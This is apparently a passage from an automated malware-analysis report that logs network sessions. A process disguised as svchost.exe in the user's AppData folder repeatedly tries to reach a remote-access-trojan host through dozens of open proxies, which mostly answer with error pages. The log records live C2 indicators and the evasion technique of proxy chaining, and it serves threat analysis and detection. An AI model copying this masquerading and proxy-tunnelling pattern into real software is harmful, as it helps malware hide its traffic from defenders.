Mar 9, 2024 13:14:32.690241098 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2929	192.168.2.5	59638	61.130.9.38	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.529334068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2930	192.168.2.5	58843	218.57.210.186	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.529942989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.442811966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.942748070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.833848953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2931	192.168.2.5	59639	61.130.9.38	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.531076908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2932	192.168.2.5	59435	221.194.149.8	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.558604002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.333794117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.354866028 CET	713	IN	HTTP/1.1 400 Bad Request Server: nginx/1.19.10 Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html Content-Length: 560 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.10</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2933	192.168.2.5	59511	3.212.148.199	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.558662891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.783179998 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:32 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2934	192.168.2.5	57147	50.63.12.33	25492	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.558662891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2935	192.168.2.5	59560	104.17.239.10	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.562094927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.716679096 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2936	192.168.2.5	59496	47.114.101.57	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.568747997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.879882097 CET	334	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 204 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2937	192.168.2.5	59464	120.78.191.225	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.573215961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.380436897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.721199036 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2938	192.168.2.5	59680	152.32.132.220	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.575476885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2939	192.168.2.5	59568	199.188.93.214	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.576591969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2940	192.168.2.5	59683	152.32.132.220	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.576685905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2941	192.168.2.5	59687	152.32.132.220	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.577864885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2942	192.168.2.5	59689	152.32.132.220	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.579510927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2943	192.168.2.5	59447	216.9.224.113	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.584888935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2944	192.168.2.5	59586	185.162.228.48	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.585386992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.739542961 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2945	192.168.2.5	59593	172.67.250.212	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.588911057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.743118048 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2946	192.168.2.5	59477	222.179.155.90	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.602442026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.963273048 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:11:49 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2947	192.168.2.5	59478	51.161.131.84	63055	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.602644920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.380518913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.548232079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2948	192.168.2.5	59765	211.234.125.5	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.610634089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2949	192.168.2.5	59767	211.234.125.5	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.612196922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2950	192.168.2.5	59503	46.17.63.166	4154	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.613403082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.910753965 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2951	192.168.2.5	59771	211.234.125.5	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.613569021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2952	192.168.2.5	59774	211.234.125.5	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.614731073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2953	192.168.2.5	59355	51.68.164.77	54504	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
